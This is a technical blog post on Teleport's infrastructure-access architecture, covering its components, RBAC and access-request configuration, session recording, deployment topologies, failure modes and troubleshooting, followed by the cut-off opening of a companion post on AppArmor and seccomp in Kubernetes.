Teleport's architecture consists of three main components that work together to provide secure infrastructure access:

1. Auth Service: The Certificate Authority

The Auth Service is the brain of a Teleport cluster. It performs three critical functions:

Certificate Authority Management:

Maintains multiple internal certificate authorities for different purposes (host CA, user CA, database CA, etc.)
Signs certificates for users and services joining the cluster
Performs certificate rotation to invalidate old certificates

Identity and Access Management:

Integrates with SSO providers (Okta, GitHub, Google Workspace, Active Directory)
Manages local users and roles
Enforces Role-Based Access Control (RBAC)
Issues temporary access through Access Requests

Audit and Compliance:

Collects audit events from all cluster components
Coordinates session recording storage
Maintains comprehensive audit logs of all access and actions

Backend Storage Options:

The Auth Service uses pluggable backend storage for cluster state and audit data:

DynamoDB + S3: AWS-native option (state in DynamoDB, recordings/logs in S3)
PostgreSQL: Self-hosted relational database option
etcd: High-availability key-value store
Firestore: Used by Teleport Cloud

Choose based on your infrastructure, performance requirements, and operational preferences.

In practice: DynamoDB + S3 is the most operationally scalable choice on AWS — it offloads capacity management and delivers predictable performance at scale. PostgreSQL is preferred for portability and on-prem deployments, but requires careful tuning (connection pooling, vacuuming, index maintenance) at scale. etcd is generally only appropriate if you're already operating it for Kubernetes and want a unified store for small deployments. Firestore is used by Teleport Cloud.

2. Proxy Service: The Access Gateway

The Proxy Service is the public-facing component that users and clients interact with. It serves as the gateway into the Teleport cluster.

Key Responsibilities:

Public Access Point:

Provides HTTPS endpoint for web UI and API
Terminates TLS connections
Serves as single point of entry for all access

Connection Routing:

Maintains reverse tunnel connections from all agents
Routes user connections to appropriate backend resources
Load balances across multiple agent instances

Session Management:

Proxies SSH, Kubernetes, database, and application protocols
Coordinates session recording
Manages concurrent session limits

Web Interface:

Hosts web-based terminal and management UI
Provides resource discovery and selection
Displays audit logs and session recordings

Why Reverse Tunnels?

Traditional architectures require opening inbound firewall rules to resources. Teleport's reverse tunnel approach means:

No Inbound Firewall Rules: Agents connect outbound to Proxy
NAT Traversal: Works behind NAT and restrictive firewalls
Private Network Access: Reach resources in private subnets without VPN
Simplified Security: Only Proxy needs public IP and open ports

3. Teleport Agents: Protocol-Specific Services

Agents run alongside infrastructure resources and handle protocol-specific access. Each agent type specializes in a particular protocol or resource type.

Agent Types:

SSH Service:

Provides SSH access to Linux/Unix servers
Provides an SSH proxy service that supports OpenSSH clients and Teleport-issued certificates
Supports standard SSH features (port forwarding, SCP, SFTP)
Records session activity

Kubernetes Service:

Provides access to Kubernetes clusters
Proxies kubectl commands and API requests
Enforces Kubernetes RBAC alongside Teleport RBAC
Audits all Kubernetes API calls

Database Service:

Provides access to databases (PostgreSQL, MySQL, MongoDB, etc.)
Issues short-lived database credentials
Audits database access sessions and connection metadata. Query-level visibility is engine-dependent — some engines support query capture natively, others require additional configuration or native database auditing alongside Teleport.
Supports secure proxying and connection multiplexing

Application Service:

Provides access to internal web applications
Handles HTTP/HTTPS proxying
Supports header-based authentication
Enables access to web apps without VPN

Desktop Service:

Provides RDP access to Windows machines
Records desktop sessions
Supports clipboard and file transfer

Multi-Service Agents:

A single agent process can run multiple services simultaneously:

# Agent running SSH, DB, and App services
teleport:
  auth_token: "xyz789"
  proxy_server: "proxy.example.com:443"

ssh_service:
  enabled: true

db_service:
  enabled: true
  databases:
  - name: "prod-postgres"
    protocol: "postgres"
    uri: "postgres.internal:5432"

app_service:
  enabled: true
  apps:
  - name: "internal-dashboard"
    uri: "http://localhost:8080"

Unified Resource Inventory and Discovery

Teleport maintains a dynamic inventory of all infrastructure resources across the cluster. This provides a centralized catalog of what exists and what users can access.

Resource Catalog Features:

Automatic Discovery: Agents can auto-discover resources (EC2 instances, RDS databases, EKS clusters)
Dynamic Labeling: Resources tagged with metadata for RBAC matching
Real-time Status: Live view of resource availability and health
Search and Filter: Find resources by labels, names, or types
Access Visibility: Shows which resources user can access based on roles

Auto-Discovery Example:

# Database service with auto-discovery
db_service:
  enabled: true
  aws:
  - types: ["rds", "aurora"]
    regions: ["us-west-2", "us-east-1"]
    tags:
      "env": "production"
      "teleport": "enabled"

This turns Teleport into not just an access platform but also an infrastructure visibility tool, automatically maintaining an up-to-date inventory without manual configuration.

↑ Back to top

Advanced Features

Role-Based Access Control (RBAC)

RBAC in Teleport determines what resources users can access and what actions they can perform. Roles are the central policy mechanism.

Role Structure:

kind: role
metadata:
  name: backend-developer
spec:
  options:
    # Certificate TTL - configurable based on security requirements
    max_session_ttl: 8h

  allow:
    # Which resources can be accessed
    logins: ['ubuntu', 'ec2-user']

    # Label-based access control
    node_labels:
      'env': ['dev', 'staging']
      'team': 'backend'

    # Database access
    db_labels:
      'env': ['dev', 'staging']
    db_names: ['analytics', 'app_db']
    db_users: ['readonly', 'app_user']

    # Kubernetes access
    kubernetes_groups: ['developers']
    kubernetes_labels:
      'env': ['dev']

Label-Based Access:

Resources are labeled, and roles specify which labels they can access. This creates dynamic access policies that automatically apply to new resources:

# Server labels
ssh_service:
  labels:
    env: production
    team: backend
    region: us-west-2

# Role can access any server matching these labels
allow:
  node_labels:
    'env': 'production'
    'team': 'backend'

Multi-Role Assignment:

Users can have multiple roles, with permissions being additive:

# User has both developer and on-call roles
users:
  alice:
    roles: ['developer', 'on-call-responder']

# Combined permissions from both roles apply

Access Requests: Just-In-Time Privilege Escalation

Access Requests enable users to temporarily request elevated privileges. This implements the principle of least privilege by default with the ability to escalate when needed.

Access Request Workflow:

Approval Workflows:

# Role that can request production access
kind: role
metadata:
  name: developer
spec:
  allow:
    request:
      roles: ['production-dba']
      thresholds:
      - approve: 2  # Requires 2 approvals
        deny: 1
      annotations:
        wtf: "Reason for access"

Integration with External Systems:

Slack: Approvals via Slack buttons
PagerDuty: Auto-approve during on-call
Jira/ServiceNow: Link to change tickets
Custom Webhooks: Integrate with any system

Session Recording and Playback

Teleport records all interactive sessions, creating a complete audit trail of infrastructure access.

What Gets Recorded:

SSH Sessions: Complete terminal input/output
Kubernetes Sessions: kubectl commands and API requests
Database Sessions: Connection events and metadata (engine-specific query visibility)
Desktop Sessions: Full RDP session video
Application Access: HTTP requests and responses

Session Recording Modes:

# Node-level recording (recorded by agent)
record_session:
  desktop: true
  default: node

# Proxy-level recording (recorded by proxy)
record_session:
  desktop: true
  default: proxy

# No recording
record_session:
  desktop: false
  default: off

Recording mode trade-offs:

Mode	Scalability	Control	Notes
`node`	Better — load distributed across agents	Lower — agent must be healthy	Preferred for large fleets
`proxy`	Heavier — Proxy bears recording CPU/bandwidth	Stronger — recording always captured centrally	Preferred when agent tampering is a concern
`off`	Best	None	Development environments only

Playback Interface:

Compliance Benefits:

PCI DSS: Administrator actions on cardholder systems
HIPAA: Access to systems with PHI
SOC 2: Evidence of access controls and monitoring
FedRAMP: Government compliance requirements

Session Moderation and Shared Access

Teleport enables real-time session collaboration and oversight—critical for training, troubleshooting, and compliance.

Session Joining:

Multiple users can join an active session:

# Start a session
tsh ssh node1

# Another user joins the session (read-only or interactive)
tsh join alice@node1

Moderated Sessions:

Require approval before sensitive sessions begin:

kind: role
metadata:
  name: production-admin
spec:
  allow:
    require_session_join:
    - name: auditor
      kinds: ['k8s', 'ssh']
      modes: ['moderator']
      on_leave: terminate

Session Controls:

Terminate: Kill an active session remotely
Monitor: Watch sessions in real-time without participating
Force Termination: Automatically end sessions when moderator leaves

Use Cases:

Training: Senior engineers guide juniors through production tasks
Compliance: Security team oversight of privileged access
Incident Response: Multiple responders collaborate on live issue
Vendor Access: Monitor third-party contractor activities

Device Trust and Hardware Security

Teleport supports enhanced security through device posture checking and hardware security keys.

Device Trust:

Verify the security posture of devices before granting access:

kind: role
metadata:
  name: production-access
spec:
  options:
    device_trust_mode: required
  allow:
    # Only devices registered and verified can access
    node_labels:
      'env': 'production'

Device Registration:

Devices must be enrolled in Teleport
Device identity verified via TPM or Secure Enclave
Can integrate with device identity and posture signals depending on platform
Certificate issued to device, not just user

Hardware Security Keys (FIDO2/WebAuthn):

# Require hardware security key for authentication
authentication:
  type: local
  second_factor: webauthn
  webauthn:
    rp_id: teleport.example.com

Benefits:

Phishing Resistance: FIDO2 keys can't be phished
Device Binding: Access tied to specific physical device
Zero Trust: Device posture continuously verified
Reduced Risk: Even if password leaked, hardware key required

Trusted Clusters: Multi-Org Federation

Trusted Clusters enable organizations to federate multiple Teleport clusters while maintaining independent security boundaries.

Architecture:

Use Cases:

Multi-Region: Separate clusters per region with central access
Business Units: Independent teams with shared identity
Customer Environments: MSPs managing multiple customer clusters
Acquisitions: Integrate acquired companies while maintaining isolation

Trust Configuration:

# On leaf cluster - establish trust with root
kind: trusted_cluster
metadata:
  name: root-cluster
spec:
  enabled: true
  role_map:
  - remote: "developer"
    local: ["leaf-developer"]
  proxy_address: root.teleport.example.com:443
  token: "trusted-cluster-join-token"

Security Considerations:

Trust is explicit and bidirectional
Role mapping controls what root users can do in leaf
Leaf cluster RBAC still enforced independently
Audit logs maintained in each cluster
Trust can be revoked at any time

Teleport Connect: Desktop Experience

Teleport Connect is a desktop application that provides a graphical interface for infrastructure access, making Teleport more accessible to users who prefer GUIs over command-line tools.

Key Features:

Visual Resource Browser: Point-and-click access to servers, databases, and Kubernetes clusters
Saved Connections: Frequently accessed resources bookmarked for quick access
Integrated Terminal: Built-in terminal for SSH sessions
Database Clients: GUI for database queries and management
Cross-Platform: Available for macOS, Windows, and Linux

Benefits:

Lower Barrier to Entry: Easier for users new to Teleport
Productivity: Quick access to common resources
Consistency: Same security model as tsh CLI
Integration: Works alongside existing Teleport deployment

Teleport Connect makes infrastructure access more intuitive while maintaining all the security benefits of certificate-based authentication and comprehensive auditing.

↑ Back to top

How It All Works Together: Complete Flow Examples

Example 1: SSH Access to Production Server

Let's walk through a complete access flow from login to executing commands:

What Happens:

User authenticates through their SSO provider
Auth Service issues short-lived certificate with user's roles
User selects server from web UI
Proxy routes connection through reverse tunnel to SSH Agent
SSH Agent validates certificate and checks RBAC
Commands execute, session recorded, audit events logged
After 8 hours, certificate expires automatically

Example 2: Database Access Request Workflow

Example 3: Kubernetes Cluster Access

↑ Back to top

Getting Started with Teleport

Quick Start: Local Testing

Get Teleport running locally in minutes:

# Download and install Teleport
curl https://goteleport.com/static/install.sh | bash

# Generate config
sudo teleport configure > /etc/teleport.yaml

# Start Teleport (Auth + Proxy + Node)
sudo teleport start

# In another terminal, create a user
sudo tctl users add myuser --roles=editor,access

# Login with the user
tsh login --proxy=localhost:3080 --user=myuser

# Connect to the local node
tsh ssh root@localhost

Common Deployment Topologies

Teleport can be deployed in multiple architectures depending on scale, availability needs, and geographic distribution.

Below are the most common deployment patterns.

1. Single-Node Deployment (Development / Small Teams)

The simplest deployment runs Auth, Proxy, and Node services together on one machine.

Best for:

Local testing
Small internal environments
Proof-of-concepts

Tradeoff:

Not highly available
Control plane is a single point of failure

2. High Availability Deployment (Production)

In production, Teleport is typically deployed with multiple Proxies and Auth nodes backed by a shared database.

Best for:

Enterprise production deployments
Thousands of users/sessions
Resilience against failures

Key Properties:

Proxies scale horizontally
Auth services share backend state
Agents connect outbound via reverse tunnels

3. Multi-Region / Global Deployment (Trusted Clusters)

Large organizations often run separate clusters per region, connected through Trusted Clusters.

Best for:

Multi-region infrastructure
Mergers/acquisitions
Customer-isolated environments (MSPs)

Benefits:

Centralized identity with regional isolation
Independent RBAC boundaries per cluster
Reduced latency by keeping access local

Choosing the Right Topology

Situation	Recommended Topology	Reason
Dev/test, single team	Single-node	No ops overhead; failure has low blast radius
Production, single region	HA (multi-Proxy, multi-Auth, shared backend)	Auth or Proxy failure must not gate all access
Multi-region, latency-sensitive	HA + Trusted Clusters	Keep session traffic local; centralize identity
MSP or multi-tenant	Trusted Clusters per tenant	Hard isolation boundary; independent RBAC per cluster
Acquisition integration	Trusted Clusters	Federate identity without merging infrastructure

The core rule: a single-node Teleport is acceptable only where downtime is acceptable. For any environment where access outages have consequences — on-call response, incident handling, production deployments — HA is not optional.

Teleport’s architecture is flexible enough to evolve as your infrastructure grows. Start with single-node, promote to HA, extend to federation — each step is a configuration change, not a rebuild.

Production Deployment Checklist

Design Your Architecture
- Determine if using Teleport Cloud or self-hosted
- Plan for high availability
- Choose backend storage (DynamoDB + S3, PostgreSQL, etcd, or Firestore)
Deploy Control Plane
- Deploy Auth Service with HA backend
- Deploy Proxy Service behind load balancer
- Configure TLS certificates
- Set up DNS records
Integrate Identity Provider
- Configure SSO (Okta, GitHub, Google, SAML)
- Define role mapping from SSO to Teleport roles
- Enable MFA requirements
Deploy Agents
- Install agents on servers, databases, Kubernetes clusters
- Configure appropriate services per agent
- Set up resource labels for RBAC
- Enable auto-discovery where applicable
Configure RBAC
- Define roles based on job functions
- Use label-based access control
- Set appropriate certificate TTLs (hours, configurable)
- Configure access request workflows
Enable Audit and Compliance
- Configure session recording
- Set up audit log forwarding
- Configure retention policies
- Integrate with SIEM if needed
Train Users
- Provide documentation for tsh commands
- Explain certificate-based authentication
- Document access request process
- Share best practices

↑ Back to top

Performance and Scaling Considerations

Connection Flow Overhead

Teleport adds minimal latency to connections:

Initial Authentication: One-time certificate issuance (1-2 seconds)
Connection Establishment: Certificate validation (milliseconds)
Data Transfer: After connection establishment, Teleport introduces minimal but non-zero overhead — primarily from TLS termination at the Proxy, connection multiplexing through the reverse tunnel, and optional session recording. In practice this is imperceptible for interactive sessions, but measurable for high-throughput database or bulk-transfer workloads.

The certificate model means Teleport doesn't need to be consulted for every packet, only for initial connection establishment.

Scaling Characteristics

Large-scale Teleport deployments can support:

Concurrent Sessions: Thousands of concurrent sessions — practical limits are driven by Proxy CPU/memory, backend IOPS, and whether session recording is enabled. Proxy-mode recording is significantly heavier than node-mode recording at scale.
Agents: Each agent establishes persistent reverse tunnel connections (typically one or a small pool, scaling dynamically under load). Tens of thousands of registered nodes are achievable with a well-sized backend.
Users: Large user bases supported (limits depend on backend performance and Auth Service sizing)
Resources: Tens of thousands of resources in inventory

Reality Check on Scale:

Teleport scales well, but scaling is not automatic — it is constrained by clear bottlenecks:

Backend IOPS and storage performance
Proxy CPU and memory resources
Audit event throughput and processing
Network bandwidth for session traffic

High-Performance Deployments

For large-scale deployments:

Deploy multiple Proxy Service instances
Use multiple Auth Service instances with shared backend
Distribute agents across regions
Use high-performance backend (DynamoDB with provisioned capacity, tuned PostgreSQL)
Enable local caching on agents
Scale DB Agents horizontally for high connection volumes

Real-world bottleneck pattern — Database Access:

At scale, database access tends to become the first performance bottleneck teams hit. DB agents must multiplex many client connections, each of which requires TLS termination and proxying. Unlike SSH sessions (which are long-lived and low-overhead once established), database workloads often involve frequent short-lived connections that amplify this cost. Connection pooling behavior at the agent level matters significantly — teams typically need to scale DB agents horizontally earlier than they expect, and often before any other component shows strain.

↑ Back to top

Best Practices

1. Certificate TTL Configuration

Keep TTLs as short as practical. Short TTLs are the primary lever for limiting blast radius on compromised credentials — an attacker with a stolen certificate can only use it until it expires.

# Short TTLs for production access
kind: role
metadata:
  name: production-access
spec:
  options:
    max_session_ttl: 4h  # 4h is a good default; adjust down if re-auth friction is acceptable

# Longer TTLs for development
kind: role
metadata:
  name: dev-access
spec:
  options:
    max_session_ttl: 24h

Rule of thumb: Production ≤ 8h (4h recommended). Bots/automation ≤ 1h. Dev ≤ 24h. Never set TTL longer than your incident response SLA.

2. Use Access Requests for Elevated Privileges

Never grant permanent production access to human users. Use time-bounded requests instead — the approval friction is a feature, not a bug. Require a reason; it creates accountability and a paper trail that's useful in audits and post-incident reviews.

kind: role
metadata:
  name: developer
spec:
  allow:
    request:
      roles: ['production-access']
      thresholds:
        - approve: 1
          deny: 1
      # Require a reason — surfaces intent and aids audit trails
      annotations:
        reason: "Required for all production access requests"

3. Implement a Governed Resource Labels Strategy

Treat labels as a typed contract, not freeform metadata. Define your schema upfront and enforce it via IaC (Terraform, Pulumi). Ad-hoc labeling leads to RBAC drift — resources silently entering or leaving access scope without review.

# Consistent labeling scheme — define this schema org-wide and enforce it
ssh_service:
  labels:
    env: production        # Required: dev | staging | production
    team: backend          # Required: maps to owning team
    region: us-west-2      # Required: for geo-scoped roles
    compliance: pci-dss    # Optional: compliance scope tags

Rule of thumb: If a label isn't defined in your schema, it shouldn't be on a resource. Audit for unlabeled or non-conforming resources regularly.

4. Enable Session Recording for All Production Access

Always record production sessions. Storage cost is negligible compared to the forensic and compliance value. Use node mode for large fleets (distributes load); use proxy mode when tamper-resistance from the agent side is a compliance requirement.

kind: role
metadata:
  name: production-access
spec:
  options:
    record_session:
      desktop: true
      default: node   # Use 'proxy' if you need centralized, tamper-resistant recording

Development roles can use default: off to reduce storage costs, but staging environments should mirror production recording policy.

5. Integrate with Your Security Stack

Forward audit logs to SIEM (Splunk, Elasticsearch)
Send alerts to incident response tools
Integrate access requests with ticketing systems
Use webhooks for custom workflows

↑ Back to top

Failure Modes and Operational Realities

Understanding failure behavior is essential for operating Teleport in production. A system you can't reason about under failure is a system you can't trust.

Component Failure Behavior

Component	Failure Impact	Active Sessions	New Sessions
Auth Service	Cannot issue new certificates	Continue (until cert expires)	Blocked
Proxy Service	All inbound access unavailable	Dropped	Blocked
Backend (DB/DynamoDB) degraded	Auth latency spikes, audit log lag	Likely continue (cached state)	Degraded/slow
Single Proxy in HA cluster	Remaining proxies absorb traffic	Disrupted briefly	Rerouted
Agent	Resources behind that agent unreachable	Terminated	Blocked for those resources

Key takeaways:

The Auth Service is the highest-impact single point of failure in a non-HA deployment. Existing sessions continue until their certificate TTL expires, but no new access can be established. This is the #1 reason to deploy Auth in HA mode for any production environment.
Proxy failure is immediately user-visible — all active sessions terminate. Multiple Proxies behind a load balancer are non-negotiable for production.
Backend degradation creates a "slow door" scenario: the system keeps working but sluggishly, often producing confusing timeout errors that look like network issues.

CA Rotation

CA rotation is the nuclear option for credential invalidation — it invalidates all outstanding certificates cluster-wide. This is powerful but operationally non-trivial:

Rotation has a grace period where both old and new CA are trusted simultaneously
All agents must pick up the new CA before the grace period ends
Any agent that doesn't rotate in time will start rejecting connections
Rotation of a large fleet requires careful monitoring and rollout coordination

Rule of thumb: Test CA rotation in staging at least once before you need it in production under incident conditions.

RBAC Sprawl

Label-based RBAC scales beautifully at small size and becomes a maintenance burden at scale if not governed:

Undocumented labels on resources create invisible access grants
Role proliferation — teams creating one-off roles instead of composing existing ones — makes audit reviews painful
Label drift — resources retagged without RBAC review can accidentally expand access

Treat labels as a contract, not metadata. Enforce label schemas via infrastructure-as-code and audit them as part of change review.

Debugging is Harder Than Direct SSH Because Teleport Introduces Multiple Control Points — Each a Potential Failure Boundary

Teleport adds indirection. When access fails, the failure could be at any layer:

Certificate expired or wrong cluster
RBAC label mismatch
Reverse tunnel down (agent offline)
Proxy routing issue
Network connectivity between Proxy and Agent
Resource itself refusing connection

The tsh status, tctl nodes ls, and Proxy Service logs are your first three debugging tools. Build runbooks for common failure paths before you need them at 2am.

↑ Back to top

Trade-offs, Limitations, and Alternatives

Teleport Trade-offs

Area	Trade-off
Latency	Teleport adds an extra network and TLS hop on every connection — negligible for interactive SSH sessions, but noticeable for high-throughput or latency-sensitive database workloads. Benchmark before assuming it's acceptable.
Complexity	You're now operating a control plane (Auth + Proxy + Backend). This is less complex than a VPN + bastion + key management stack, but it's still infrastructure you own and must keep healthy.
Lock-in	Strong coupling to Teleport's certificate model, RBAC system, and agent deployment. Migrating away is non-trivial.
Debugging	Failures are less transparent than direct SSH. Every hop is a potential failure point.
Cost	Self-hosted requires infra + ops investment. Enterprise features (Device Trust, Access Monitoring, Policy) add license cost.
CA rotation	Invalidating all credentials is operationally complex and requires advance planning.

What Teleport Does NOT Solve

Teleport enforces access at the entry point, not within the system. It secures the path to infrastructure — it does not secure what happens inside infrastructure after access is granted:

Application-level authorization: Teleport gets you a shell or a DB connection. What you do with it is governed by application and database permissions, not Teleport.
Lateral movement inside a host: Once a user has SSH access to a server, they can attempt to move laterally to other systems reachable from that host. Teleport doesn't prevent this.
Compromised workloads: If a service running on a server is compromised, that service can use its existing credentials. Teleport doesn't protect against post-exploitation of running workloads.
Secrets inside applications: Environment variables, config files, and secrets managers are outside Teleport's scope.
Insider threats post-access: Teleport records what was done, which helps with detection and forensics — but it doesn't prevent a malicious authorized user from exfiltrating data during their session.

Teleport is one layer of a defense-in-depth strategy, not a complete security posture.

Comparison With Modern Alternatives

Teleport is not the only approach to modern infrastructure access:

Tool	Model	Strengths	Weaknesses vs Teleport
AWS SSM / IAM Identity Center	Infrastructure-native	No agent to maintain on AWS resources, native IAM integration	AWS-only, limited protocol support, weaker audit UI
Cloudflare Access / Zero Trust	Identity-aware proxy	Excellent for web apps and browser-based access, global PoPs	Weaker for SSH/DB/K8s native protocol support
Tailscale	Mesh VPN + identity	Very simple to operate, low overhead, great for small teams	No session recording, weaker RBAC, not compliance-oriented
BeyondCorp (Google)	Device + identity aware proxy	Proven at extreme scale	Expensive, complex to replicate outside Google's ecosystem
CyberArk / HashiCorp Vault	PAM / secrets management	Deep secrets management, strong enterprise PAM	More complex to operate, less developer-friendly UX

Where Teleport fits: Teleport sits between identity-aware proxies (Cloudflare, BeyondCorp) and infrastructure-native access systems (SSM). It offers deeper protocol-level control and richer session recording than most ZTNA tools, at the cost of a more complex control plane to operate.

When Teleport Becomes a Bad Idea

Teleport shines in complexity — not simplicity. There are clear situations where adopting it is the wrong call:

100% AWS with SSM already working well: If your infrastructure is AWS-native and your team already uses SSM + IAM Identity Center effectively, Teleport adds a new control plane without proportionate gain. SSM is simpler to operate and deeply integrated with IAM.
Small teams (< 10 engineers): The operational overhead — HA deployment, CA rotation, RBAC governance, agent fleet management — often outweighs the security benefits at small scale. A well-configured bastion with short-lived keys and MFA may be the right answer.
Cannot operate HA control planes reliably: If you are not prepared to operate a highly available control plane, Teleport becomes a single point of failure rather than a security improvement. A single-node Auth Service gates every infrastructure connection in your environment — that's a harder failure than a downed bastion, which only blocked SSH.
Ultra-low latency or high-throughput DB access: Every connection transits the Proxy. For latency-sensitive or bulk-transfer database workloads, the proxying overhead is real and measurable. Benchmark before committing.
Team lacks operational maturity for a distributed control plane: Teleport failures are subtle. A team that isn't comfortable debugging reverse tunnel health, CA states, and RBAC label interactions will find it harder to operate than what it replaced.

The honest test: If someone on your team can't answer "what happens when the Auth Service goes down?", you're not ready to run Teleport in production.

How Teams Typically Adopt Teleport

Teleport adoption is rarely a single migration — it's an incremental replacement of legacy access patterns. Teams that succeed tend to follow a similar path:

Replace bastion SSH access — lowest risk, highest immediate visibility gain
Add Kubernetes and database access — consolidates the access model across protocols
Introduce Access Requests for production — eliminates standing privileges for the highest-risk tier
Enable session recording for compliance — adds the audit trail needed for SOC 2, PCI, HIPAA
Expand into multi-cluster federation — scales the model to multiple regions or business units

Each stage delivers value independently. You don't need to complete stage 5 to justify the investment at stage 1.

↑ Back to top

Opinionated Architecture Guidance

Rules of Thumb for Production Deployments

These aren't configuration options — they're operational decisions that most teams learn the hard way:

Certificate TTLs:

Production access: ≤ 8 hours. Shorter is better. 4 hours is a reasonable default.
Bot/automation tokens: ≤ 1 hour. Treat like API keys with aggressive expiry.
Development access: 24 hours is acceptable. Convenience at lower risk.
Never set max_session_ttl longer than your incident response SLA — if a credential is compromised, you need it to expire before your team can respond.

Access design:

Never grant direct production roles to humans. Always require Access Requests with approval for elevated access. The friction is the feature.
Treat labels as a typed API, not freeform metadata. Define a label schema (env, team, region, compliance) and enforce it via IaC. Label drift creates silent access grants.
Prefer role composition over role proliferation. Five composable roles are easier to audit than fifty specialized ones.

Cluster topology:

Use a single cluster until you have a concrete reason not to. Trusted Clusters add operational overhead — don't adopt them for organizational tidiness alone.
Reach for Trusted Clusters when: you need hard security isolation between environments (e.g., production vs. customer tenants), you're operating in multiple regions with latency-sensitive access, or you're managing customer-isolated environments as an MSP.
Avoid auto-discovery in highly dynamic environments without governance controls on labeling — auto-discovered resources with unreviewed labels can silently enter RBAC scope.

Session recording:

Use node mode for large fleets. The distributed load model scales better.
Use proxy mode when you have strict compliance requirements and need recording to be tamper-proof from the agent side.
Always record production. Storage cost is negligible compared to the compliance and forensic value.

↑ Back to top

Troubleshooting Common Issues

Debugging Mental Model: Always trace the path: User → Proxy → Tunnel → Agent → Resource. Failures almost always occur at boundaries between these layers — start at the user end and walk forward until you find where the chain breaks.

Teleport adds multiple layers between a user and a resource. When something fails, work through the layers in order rather than jumping straight to logs. Most failures are in layers 1–3.

Layer 1: Certificate (user)         → tsh status
Layer 2: RBAC / label match         → tctl get roles, check node labels
Layer 3: Agent health               → tctl nodes ls, agent logs
Layer 4: Reverse tunnel             → Proxy logs, tctl status
Layer 5: Network (Proxy ↔ Agent)    → connectivity check, firewall rules
Layer 6: Resource itself            → resource-side logs

Concrete example — SSH connection fails:

1. tsh ssh prod-server fails
   → tsh status: cert valid, roles present ✓
   → tctl nodes ls: prod-server not in list ✗

2. Agent offline — check agent logs on the server
   → Agent can't reach Proxy on port 443
   → Firewall rule blocking outbound from the new subnet ✗

Resolution: Add egress rule. Agent reconnects, node appears in inventory.

Key insight: The failure looked like an SSH problem.
It was a network problem between Agent and Proxy — two layers removed from where the user felt the error.

Most issues are not in the SSH layer — they are in the identity or routing layers above it.

Connection Issues

Problem: Cannot connect to a resource through Teleport

Check:

Certificate is not expired: tsh status
User has appropriate role: tsh status shows roles
Resource labels match role's node_labels / db_labels / etc. — this is the most common silent failure
Agent is online: tctl nodes ls or Web UI (offline agent = resource disappears from inventory)
Reverse tunnel is established: Check Proxy Service logs for tunnel registration events

Certificate Issues

Problem: Certificate verification failures

Causes:

Certificate expired (re-login with tsh login)
CA rotation in progress — agents that haven't yet picked up the new CA will reject connections; monitor rotation progress carefully
Time skew between systems (sync NTP — even a few seconds of drift causes cert validation to fail)
Wrong cluster (verify --proxy parameter matches the target cluster)

Performance Issues

Problem: Slow connections or timeouts

Check:

Network latency between Proxy and Agent — the reverse tunnel adds a round-trip; high-latency paths between Proxy and Agent are directly user-visible
Backend storage performance — slow DynamoDB or PostgreSQL manifests as slow auth, slow resource listing, and delayed audit writes
Session recording mode — proxy mode under high load is a common but non-obvious bottleneck; consider switching to node mode or scaling Proxy horizontally
Reverse tunnel health — a degraded tunnel causes intermittent timeouts that are easy to mistake for network issues
Agent resource usage (CPU, memory) — DB agents under high connection volume are a frequent culprit

↑ Back to top

Conclusion

Teleport represents a meaningful shift in how organizations secure infrastructure access — replacing long-lived credentials with short-lived certificates, eliminating VPN perimeters with reverse tunnels, and providing comprehensive audit logging across protocols.

But it's worth being precise about what that shift entails. Teleport is not just an access tool — it is a distributed identity and access control plane that sits on the critical path of every infrastructure connection. You operate it, rotate its CA, govern its RBAC, and debug it at 2am. The security benefits are real. So are the operational costs.

Key Takeaways:

Certificate-Based Authentication: As covered in the architecture section, short-lived certificates eliminate standing credentials — but authorization still depends on centrally issued roles, and revocation requires CA rotation or lockout, not a simple flag.
Zero Trust Architecture: Every connection is independently authenticated and authorized, regardless of network location. Teleport eliminates network-based trust — it does not eliminate the need for application-level authorization, secrets management, or lateral movement controls.
Unified Access: Single platform for SSH, Kubernetes, databases, applications, and desktops.
Protocol Native: Works with existing tools (ssh, kubectl, psql) without requiring new clients.
Comprehensive Audit: Complete visibility into who accessed what, when, and what they did — session recording, event logs, and Access Request trails.
Operationally Non-Trivial: HA deployment, CA rotation planning, RBAC governance, and debugging skills are requirements for production, not afterthoughts.

For teams that outgrow VPN + bastion + manual key rotation, Teleport is one of the most complete infrastructure access platforms available. The architecture is sound, the developer experience is strong, and the compliance story is well-developed. Adopt it with eyes open to the operational investment it requires, and it will pay dividends in security posture and audit readiness.

↑ Back to top

Additional Resources

Official Documentation: https://goteleport.com/docs/
GitHub Repository: https://github.com/gravitational/teleport
Community Forum: https://github.com/gravitational/teleport/discussions
Architecture Reference: https://goteleport.com/docs/reference/architecture/
Security Whitepaper: Available on Teleport website
Compliance Documentation: SOC 2, FedRAMP, and other certifications

Originally published at - https://platformwale.blog

AppArmor and Seccomp in Kubernetes: What the Docs Don't Tell You

Piyush Jajoo — Sun, 22 Mar 2026 19:05:33 +0000

You've read the Kubernetes security docs. You know to set appArmorProfile: RuntimeDefault and seccompProfile: RuntimeDefault. You've ticked the CIS Benchmark boxes. And yet, if a container in your cluster were compromised right now, you might be surprised by what these controls would — and wouldn't — stop.

This post is for engineers who've moved past configuration and want to reason about AppArmor and seccomp under pressure: their real enforcement models, where each fails, how they interact, how to manage them at scale, and what breaks first in production.

If you haven't read the companion post on syscalls — Syscalls in Kubernetes: The Invisible Layer That Runs Everything — the enforcement mechanics below will make more sense with that foundation. Both controls operate on the syscall path; understanding what a syscall is and how it traverses the kernel is prerequisite context.

Why Platform Teams Should Care
How the Kernel Enforces Security: Not a Pipeline
From Syscall to Enforcement: The Full Execution Path
The Runtime Default Trap
Managing Profiles at Scale: Declarative or Nothing
Writing a Real Profile: The Rule Model
- The Path-Based Trap
What AppArmor Won't Stop
AppArmor vs. Seccomp vs. SELinux: An Opinionated Take
- Choosing AppArmor vs. SELinux at Platform Level
- Control Failure Mode Comparison
- When Is seccomp Alone Enough?
- LSM Stacking: The Frontier
Seccomp: Deeper Than You Think
- The cBPF Filter Model
- Return Actions (More Than Allow/Deny)
- Argument Filtering: The Underused Power Feature
- Two Non-Obvious Properties
- What Seccomp Won't Stop
A Threat Scenario: Container Escape Attempt
What Breaks First in Production
Performance Considerations
A Production-Grade Pod Spec
Observability: Catching Denials Before They Become Incidents
Compliance Mapping
A Realistic Failure Postmortem
AppArmor's Threat Model Boundary
The Operational Cost of AppArmor
Common Anti-Patterns
Platform Team Playbook
Designing for Control Failure
Key Takeaways
The Real Purpose of AppArmor
If You Remember Only One Thing Per Control
Closing Thoughts

Why Platform Teams Should Care

Most Kubernetes clusters already run with several security controls in place:

Pod Security Standards at admission
seccomp RuntimeDefault filtering syscalls
NetworkPolicies governing traffic paths
RBAC limiting API surface

So why add AppArmor to that stack?

